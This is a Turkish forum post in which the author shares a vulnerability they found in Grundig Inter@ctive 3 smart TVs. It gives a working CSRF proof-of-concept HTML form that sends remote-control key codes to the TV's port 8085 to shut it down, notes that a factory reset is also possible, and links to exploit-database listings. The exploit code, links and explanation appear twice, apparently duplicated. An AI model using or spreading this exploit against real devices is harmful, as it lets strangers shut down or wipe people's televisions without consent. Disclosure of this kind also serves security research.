siteler vs. sarmadı artık televizyon buzdolabı falan hekliyoz
şakası bir yana yaklaşık 1-2 hafta önce akıllı televizyonu kurcalarken bulduğum bir açık. Google play'den grundig remote app ' ı telefonunza kurup televizyon ile eşleştirmeniz gerekmekte. Eşleştikten sonra bilgisayardan local ip ' nizin 8085 portuna bağlanın. Uygulama ile televizyonun iletişime geçtiği mekan orası. Oradan gerekli key'leri vererek televizyonu kapatabilir , fabrika ayarlarını dahi sıfırlayabilirsiniz. Hatta keyleri vermenize gerek yok ben size direk csrf pocunu şöyle vereyim 
<html>
<head>
<title>Grundig TV PoC</title>
</head>
<body>
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&
keysymbol=-4081
<http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>">
<input type="submit" value="Go!">
</form>
</body>
</html>
butona bastığınız gibi televizyonu kapatacaktır
Exploit Sitelerinde Yayınlanan Hali:
https://packetstormsecurity.com/fil...ive-3.0-Insecure-Direct-Object-Reference.html
https://www.exploit-db.com/exploits/45022/
http://expku.com/dos/7724.html
https://cxsecurity.com/issue/WLB-2018070102
Nasıl exploit ettiğimin detaylı anlatımı ;
http://ahmeth4n.org/oku.php?id=3
<html>
<head>
<title>Grundig TV PoC</title>
</head>
<body>
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&
keysymbol=-4081
<http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>">
<input type="submit" value="Go!">
</form>
</body>
</html>
butona bastığınız gibi televizyonu kapatacaktır
Exploit Sitelerinde Yayınlanan Hali:
https://packetstormsecurity.com/fil...ive-3.0-Insecure-Direct-Object-Reference.html
https://www.exploit-db.com/exploits/45022/
http://expku.com/dos/7724.html
https://cxsecurity.com/issue/WLB-2018070102
Nasıl exploit ettiğimin detaylı anlatımı ;
http://ahmeth4n.org/oku.php?id=3